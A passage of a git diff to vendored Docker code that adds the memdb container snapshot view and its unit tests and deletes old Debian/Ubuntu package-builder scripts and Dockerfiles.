nil { + return err + } + if s != nil { + if s.(nameAssociation).containerID != containerID { + return ErrNameReserved + } + return nil + } + return txn.Insert(memdbNamesTable, nameAssociation{name: name, containerID: containerID}) + }) +} + +// ReleaseName releases the reserved name +// Once released, a name can be reserved again +func (db *memDB) ReleaseName(name string) error { + return db.withTxn(func(txn *memdb.Txn) error { + return txn.Delete(memdbNamesTable, nameAssociation{name: name}) + }) +} + +type memdbView struct { + txn *memdb.Txn +} + +// All returns a all items in this snapshot. Returned objects must never be modified. +func (v *memdbView) All() ([]Snapshot, error) { + var all []Snapshot + iter, err := v.txn.Get(memdbContainersTable, memdbIDIndex) + if err != nil { + return nil, err + } + for { + item := iter.Next() + if item == nil { + break + } + snapshot := v.transform(item.(*Container)) + all = append(all, *snapshot) + } + return all, nil +} + +// Get returns an item by id. Returned objects must never be modified. +func (v *memdbView) Get(id string) (*Snapshot, error) { + s, err := v.txn.First(memdbContainersTable, memdbIDIndex, id) + if err != nil { + return nil, err + } + if s == nil { + return nil, NoSuchContainerError{id: id} + } + return v.transform(s.(*Container)), nil +} + +// getNames lists all the reserved names for the given container ID. +func (v *memdbView) getNames(containerID string) []string { + iter, err := v.txn.Get(memdbNamesTable, memdbContainerIDIndex, containerID) + if err != nil { + return nil + } + + var names []string + for { + item := iter.Next() + if item == nil { + break + } + names = append(names, item.(nameAssociation).name) + } + + return names +} + +// GetID returns the container ID that the passed in name is reserved to. +func (v *memdbView) GetID(name string) (string, error) { + s, err := v.txn.First(memdbNamesTable, memdbIDIndex, name) + if err != nil { + return "", err + } + if s == nil { + return "", ErrNameNotReserved + } + return s.(nameAssociation).containerID, nil +} + +// GetAllNames returns all registered names. +func (v *memdbView) GetAllNames() map[string][]string { + iter, err := v.txn.Get(memdbNamesTable, memdbContainerIDIndex) + if err != nil { + return nil + } + + out := make(map[string][]string) + for { + item := iter.Next() + if item == nil { + break + } + assoc := item.(nameAssociation) + out[assoc.containerID] = append(out[assoc.containerID], assoc.name) + } + + return out +} + +// transform maps a (deep) copied Container object to what queries need. +// A lock on the Container is not held because these are immutable deep copies. +func (v *memdbView) transform(container *Container) *Snapshot { + health := types.NoHealthcheck + if container.Health != nil { + health = container.Health.Status() + } + snapshot := &Snapshot{ + Container: types.Container{ + ID: container.ID, + Names: v.getNames(container.ID), + ImageID: container.ImageID.String(), + Ports: []types.Port{}, + Mounts: container.GetMountPoints(), + State: container.State.StateString(), + Status: container.State.String(), + Created: container.Created.Unix(), + }, + CreatedAt: container.Created, + StartedAt: container.StartedAt, + Name: container.Name, + Pid: container.Pid, + Managed: container.Managed, + ExposedPorts: make(nat.PortSet), + PortBindings: make(nat.PortSet), + Health: health, + Running: container.Running, + Paused: container.Paused, + ExitCode: container.ExitCode(), + } + + if snapshot.Names == nil { + // Dead containers will often have no name, so make sure the response isn't null + snapshot.Names = []string{} + } + + if container.HostConfig != nil { + snapshot.Container.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode) + snapshot.HostConfig.Isolation = string(container.HostConfig.Isolation) + for binding := range container.HostConfig.PortBindings { + snapshot.PortBindings[binding] = struct{}{} + } + } + + if container.Config != nil { + snapshot.Image = container.Config.Image + snapshot.Labels = container.Config.Labels + for exposed := range container.Config.ExposedPorts { + snapshot.ExposedPorts[exposed] = struct{}{} + } + } + + if len(container.Args) > 0 { + var args []string + for _, arg := range container.Args { + if strings.Contains(arg, " ") { + args = append(args, fmt.Sprintf("'%s'", arg)) + } else { + args = append(args, arg) + } + } + argsAsString := strings.Join(args, " ") + snapshot.Command = fmt.Sprintf("%s %s", container.Path, argsAsString) + } else { + snapshot.Command = container.Path + } + + snapshot.Ports = []types.Port{} + networks := make(map[string]*network.EndpointSettings) + if container.NetworkSettings != nil { + for name, netw := range container.NetworkSettings.Networks { + if netw == nil || netw.EndpointSettings == nil { + continue + } + networks[name] = &network.EndpointSettings{ + EndpointID: netw.EndpointID, + Gateway: netw.Gateway, + IPAddress: netw.IPAddress, + IPPrefixLen: netw.IPPrefixLen, + IPv6Gateway: netw.IPv6Gateway, + GlobalIPv6Address: netw.GlobalIPv6Address, + GlobalIPv6PrefixLen: netw.GlobalIPv6PrefixLen, + MacAddress: netw.MacAddress, + NetworkID: netw.NetworkID, + } + if netw.IPAMConfig != nil { + networks[name].IPAMConfig = &network.EndpointIPAMConfig{ + IPv4Address: netw.IPAMConfig.IPv4Address, + IPv6Address: netw.IPAMConfig.IPv6Address, + } + } + } + for port, bindings := range container.NetworkSettings.Ports { + p, err := nat.ParsePort(port.Port()) + if err != nil { + logrus.Warnf("invalid port map %+v", err) + continue + } + if len(bindings) == 0 { + snapshot.Ports = append(snapshot.Ports, types.Port{ + PrivatePort: uint16(p), + Type: port.Proto(), + }) + continue + } + for _, binding := range bindings { + h, err := nat.ParsePort(binding.HostPort) + if err != nil { + logrus.Warnf("invalid host port map %+v", err) + continue + } + snapshot.Ports = append(snapshot.Ports, types.Port{ + PrivatePort: uint16(p), + PublicPort: uint16(h), + Type: port.Proto(), + IP: binding.HostIP, + }) + } + } + } + snapshot.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks} + + return snapshot +} + +// containerByIDIndexer is used to extract the ID field from Container types. +// memdb.StringFieldIndex can not be used since ID is a field from an embedded struct. +type containerByIDIndexer struct{} + +// FromObject implements the memdb.SingleIndexer interface for Container objects +func (e *containerByIDIndexer) FromObject(obj interface{}) (bool, []byte, error) { + c, ok := obj.(*Container) + if !ok { + return false, nil, fmt.Errorf("%T is not a Container", obj) + } + // Add the null character as a terminator + v := c.ID + "\x00" + return true, []byte(v), nil +} + +// FromArgs implements the memdb.Indexer interface +func (e *containerByIDIndexer) FromArgs(args ...interface{}) ([]byte, error) { + if len(args) != 1 { + return nil, fmt.Errorf("must provide only a single argument") + } + arg, ok := args[0].(string) + if !ok { + return nil, fmt.Errorf("argument must be a string: %#v", args[0]) + } + // Add the null character as a terminator + arg += "\x00" + return []byte(arg), nil +} + +// namesByNameIndexer is used to index container name associations by name. +type namesByNameIndexer struct{} + +func (e *namesByNameIndexer) FromObject(obj interface{}) (bool, []byte, error) { + n, ok := obj.(nameAssociation) + if !ok { + return false, nil, fmt.Errorf(`%T does not have type "nameAssociation"`, obj) + } + + // Add the null character as a terminator + return true, []byte(n.name + "\x00"), nil +} + +func (e *namesByNameIndexer) FromArgs(args ...interface{}) ([]byte, error) { + if len(args) != 1 { + return nil, fmt.Errorf("must provide only a single argument") + } + arg, ok := args[0].(string) + if !ok { + return nil, fmt.Errorf("argument must be a string: %#v", args[0]) + } + // Add the null character as a terminator + arg += "\x00" + return []byte(arg), nil +} + +// namesByContainerIDIndexer is used to index container names by container ID. +type namesByContainerIDIndexer struct{} + +func (e *namesByContainerIDIndexer) FromObject(obj interface{}) (bool, []byte, error) { + n, ok := obj.(nameAssociation) + if !ok { + return false, nil, fmt.Errorf(`%T does not have type "nameAssocation"`, obj) + } + + // Add the null character as a terminator + return true, []byte(n.containerID + "\x00"), nil +} + +func (e *namesByContainerIDIndexer) FromArgs(args ...interface{}) ([]byte, error) { + if len(args) != 1 { + return nil, fmt.Errorf("must provide only a single argument") + } + arg, ok := args[0].(string) + if !ok { + return nil, fmt.Errorf("argument must be a string: %#v", args[0]) + } + // Add the null character as a terminator + arg += "\x00" + return []byte(arg), nil +} diff --git a/vendor/github.com/docker/docker/container/view_test.go b/vendor/github.com/docker/docker/container/view_test.go new file mode 100644 index 0000000000..434b7c618d --- /dev/null +++ b/vendor/github.com/docker/docker/container/view_test.go @@ -0,0 +1,186 @@ +package container // import "github.com/docker/docker/container" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/pborman/uuid" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +var root string + +func TestMain(m *testing.M) { + var err error + root, err = ioutil.TempDir("", "docker-container-test-") + if err != nil { + panic(err) + } + defer os.RemoveAll(root) + + os.Exit(m.Run()) +} + +func newContainer(t *testing.T) *Container { + var ( + id = uuid.New() + cRoot = filepath.Join(root, id) + ) + if err := os.MkdirAll(cRoot, 0755); err != nil { + t.Fatal(err) + } + c := NewBaseContainer(id, cRoot) + c.HostConfig = &containertypes.HostConfig{} + return c +} + +func TestViewSaveDelete(t *testing.T) { + db, err := NewViewDB() + if err != nil { + t.Fatal(err) + } + c := newContainer(t) + if err := c.CheckpointTo(db); err != nil { + t.Fatal(err) + } + if err := db.Delete(c); err != nil { + t.Fatal(err) + } +} + +func TestViewAll(t *testing.T) { + var ( + db, _ = NewViewDB() + one = newContainer(t) + two = newContainer(t) + ) + one.Pid = 10 + if err := one.CheckpointTo(db); err != nil { + t.Fatal(err) + } + two.Pid = 20 + if err := two.CheckpointTo(db); err != nil { + t.Fatal(err) + } + + all, err := db.Snapshot().All() + if err != nil { + t.Fatal(err) + } + if l := len(all); l != 2 { + t.Fatalf("expected 2 items, got %d", l) + } + byID := make(map[string]Snapshot) + for i := range all { + byID[all[i].ID] = all[i] + } + if s, ok := byID[one.ID]; !ok || s.Pid != 10 { + t.Fatalf("expected something different with for id=%s: %v", one.ID, s) + } + if s, ok := byID[two.ID]; !ok || s.Pid != 20 { + t.Fatalf("expected something different with for id=%s: %v", two.ID, s) + } +} + +func TestViewGet(t *testing.T) { + var ( + db, _ = NewViewDB() + one = newContainer(t) + ) + one.ImageID = "some-image-123" + if err := one.CheckpointTo(db); err != nil { + t.Fatal(err) + } + s, err := db.Snapshot().Get(one.ID) + if err != nil { + t.Fatal(err) + } + if s == nil || s.ImageID != "some-image-123" { + t.Fatalf("expected ImageID=some-image-123. Got: %v", s) + } +} + +func TestNames(t *testing.T) { + db, err := NewViewDB() + if err != nil { + t.Fatal(err) + } + assert.Check(t, db.ReserveName("name1", "containerid1")) + assert.Check(t, db.ReserveName("name1", "containerid1")) // idempotent + assert.Check(t, db.ReserveName("name2", "containerid2")) + assert.Check(t, is.Error(db.ReserveName("name2", "containerid3"), ErrNameReserved.Error())) + + // Releasing a name allows the name to point to something else later. + assert.Check(t, db.ReleaseName("name2")) + assert.Check(t, db.ReserveName("name2", "containerid3")) + + view := db.Snapshot() + + id, err := view.GetID("name1") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid1", id)) + + id, err = view.GetID("name2") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid3", id)) + + _, err = view.GetID("notreserved") + assert.Check(t, is.Error(err, ErrNameNotReserved.Error())) + + // Releasing and re-reserving a name doesn't affect the snapshot. + assert.Check(t, db.ReleaseName("name2")) + assert.Check(t, db.ReserveName("name2", "containerid4")) + + id, err = view.GetID("name1") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid1", id)) + + id, err = view.GetID("name2") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid3", id)) + + // GetAllNames + assert.Check(t, is.DeepEqual(map[string][]string{"containerid1": {"name1"}, "containerid3": {"name2"}}, view.GetAllNames())) + + assert.Check(t, db.ReserveName("name3", "containerid1")) + assert.Check(t, db.ReserveName("name4", "containerid1")) + + view = db.Snapshot() + assert.Check(t, is.DeepEqual(map[string][]string{"containerid1": {"name1", "name3", "name4"}, "containerid4": {"name2"}}, view.GetAllNames())) + + // Release containerid1's names with Delete even though no container exists + assert.Check(t, db.Delete(&Container{ID: "containerid1"})) + + // Reusing one of those names should work + assert.Check(t, db.ReserveName("name1", "containerid4")) + view = db.Snapshot() + assert.Check(t, is.DeepEqual(map[string][]string{"containerid4": {"name1", "name2"}}, view.GetAllNames())) +} + +// Test case for GitHub issue 35920 +func TestViewWithHealthCheck(t *testing.T) { + var ( + db, _ = NewViewDB() + one = newContainer(t) + ) + one.Health = &Health{ + Health: types.Health{ + Status: "starting", + }, + } + if err := one.CheckpointTo(db); err != nil { + t.Fatal(err) + } + s, err := db.Snapshot().Get(one.ID) + if err != nil { + t.Fatal(err) + } + if s == nil || s.Health != "starting" { + t.Fatalf("expected Health=starting. Got: %+v", s) + } +} diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh deleted file mode 100755 index 8271d9dc47..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh deleted file mode 100755 index b5040b709a..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh +++ /dev/null @@ -1,118 +0,0 @@ -#!/bin/bash -set -e - -# This file is used to auto-generate Dockerfiles for making debs via 'make deb' -# -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh ubuntu-trusty -# to only update ubuntu-trusty/Dockerfile -# or: ./generate.sh ubuntu-newversion -# to create a new folder and a Dockerfile within it -# -# Note: non-LTS versions are not guaranteed to work. - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - echo "${versions[@]}" - distro="${version%-*}" - suite="${version##*-}" - from="aarch64/${distro}:${suite}" - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! - # - - FROM $from - - EOF - - dockerBuildTags='apparmor pkcs11 selinux' - runcBuildTags='apparmor selinux' - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - - case "$suite" in - trusty) - packages+=( libsystemd-journal-dev ) - # aarch64 doesn't have an official downloadable binary for go. - # And gccgo for trusty only includes Go 1.2 implementation which - # is too old to build current go source, fortunately trusty has - # golang-1.6-go package can be used as bootstrap. - packages+=( golang-1.6-go ) - ;; - xenial) - packages+=( libsystemd-dev ) - packages+=( golang-go libseccomp-dev) - - dockerBuildTags="$dockerBuildTags seccomp" - runcBuildTags="$runcBuildTags seccomp" - ;; - *) - echo "Unsupported distro:" $distro:$suite - rm -fr "$version" - exit 1 - ;; - esac - - # update and install packages - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - case "$suite" in - trusty) - echo 'RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - ;; - *) - ;; - esac - - echo "# Install Go" >> "$version/Dockerfile" - echo "# aarch64 doesn't have official go binaries, so use the version of go installed from" >> "$version/Dockerfile" - echo "# the image to build go from source." >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.aarch64 >> "$version/Dockerfile" - echo 'RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \' >> "$version/Dockerfile" - echo ' && cd /usr/src/go/src \' >> "$version/Dockerfile" - echo ' && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo 'ENV PATH $PATH:/usr/src/go/bin' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo "ENV AUTO_GOPATH 1" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo "ENV DOCKER_BUILDTAGS $dockerBuildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile deleted file mode 100644 index d04860ccd7..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,24 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! -# - -FROM aarch64/ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev golang-1.6-go --no-install-recommends && rm -rf /var/lib/apt/lists/* - -RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100 - -# Install Go -# aarch64 doesn't have official go binaries, so use the version of go installed from -# the image to build go from source. -ENV GO_VERSION 1.7.5 -RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ - && cd /usr/src/go/src \ - && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash - -ENV PATH $PATH:/usr/src/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile deleted file mode 100644 index 3cd8442eca..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! -# - -FROM aarch64/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-dev golang-go libseccomp-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -# Install Go -# aarch64 doesn't have official go binaries, so use the version of go installed from -# the image to build go from source. -ENV GO_VERSION 1.7.5 -RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ - && cd /usr/src/go/src \ - && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash - -ENV PATH $PATH:/usr/src/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux seccomp -ENV RUNC_BUILDTAGS apparmor selinux seccomp diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md deleted file mode 100644 index 20a0ff1006..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md +++ /dev/null @@ -1,5 +0,0 @@ -# `dockercore/builder-deb` - -This image's tags contain the dependencies for building Docker `.deb`s for each of the Debian-based platforms Docker targets. - -To add new tags, see [`contrib/builder/deb/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/deb/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh deleted file mode 100755 index 8271d9dc47..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile deleted file mode 100644 index 42aaa56c01..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile +++ /dev/null @@ -1,20 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM debian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile deleted file mode 100644 index c052be56ce..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile +++ /dev/null @@ -1,20 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM debian:stretch - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile deleted file mode 100644 index bcedb47b94..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM debian:wheezy-backports - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list - -RUN apt-get update && apt-get install -y -t wheezy-backports btrfs-tools --no-install-recommends && rm -rf /var/lib/apt/lists/* -RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh deleted file mode 100755 index 765db5d8e9..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh +++ /dev/null @@ -1,149 +0,0 @@ -#!/bin/bash -set -e - -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh debian-jessie -# to only update debian-jessie/Dockerfile -# or: ./generate.sh debian-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - distro="${version%-*}" - suite="${version##*-}" - from="${distro}:${suite}" - - case "$from" in - debian:wheezy) - # add -backports, like our users have to - from+='-backports' - ;; - esac - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! - # - - FROM $from - EOF - - echo >> "$version/Dockerfile" - - if [ "$distro" = "debian" ]; then - cat >> "$version/Dockerfile" <<-'EOF' - # allow replacing httpredir or deb mirror - ARG APT_MIRROR=deb.debian.org - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - EOF - - if [ "$suite" = "wheezy" ]; then - cat >> "$version/Dockerfile" <<-'EOF' - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list - EOF - fi - - echo "" >> "$version/Dockerfile" - fi - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libseccomp-dev # for "seccomp.h" & "libseccomp.so" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - # packaging for "sd-journal.h" and libraries varies - case "$suite" in - precise|wheezy) ;; - jessie|trusty) packages+=( libsystemd-journal-dev );; - *) packages+=( libsystemd-dev );; - esac - - # debian wheezy & ubuntu precise do not have the right libseccomp libs - # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( - case "$suite" in - precise|wheezy|jessie|trusty) - packages=( "${packages[@]/libseccomp-dev}" ) - runcBuildTags="apparmor selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor seccomp selinux" - ;; - esac - - - if [ "$suite" = 'precise' ]; then - # precise has a few package issues - - # - dh-systemd doesn't exist at all - packages=( "${packages[@]/dh-systemd}" ) - - # - libdevmapper-dev is missing critical structs (too old) - packages=( "${packages[@]/libdevmapper-dev}" ) - extraBuildTags+=' exclude_graphdriver_devicemapper' - - # - btrfs-tools is missing "ioctl.h" (too old), so it's useless - # (since kernels on precise are old too, just skip btrfs entirely) - packages=( "${packages[@]/btrfs-tools}" ) - extraBuildTags+=' exclude_graphdriver_btrfs' - fi - - if [ "$suite" = 'wheezy' ]; then - # pull a couple packages from backports explicitly - # (build failures otherwise) - backportsPackages=( btrfs-tools ) - for pkg in "${backportsPackages[@]}"; do - packages=( "${packages[@]/$pkg}" ) - done - echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - fi - - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile 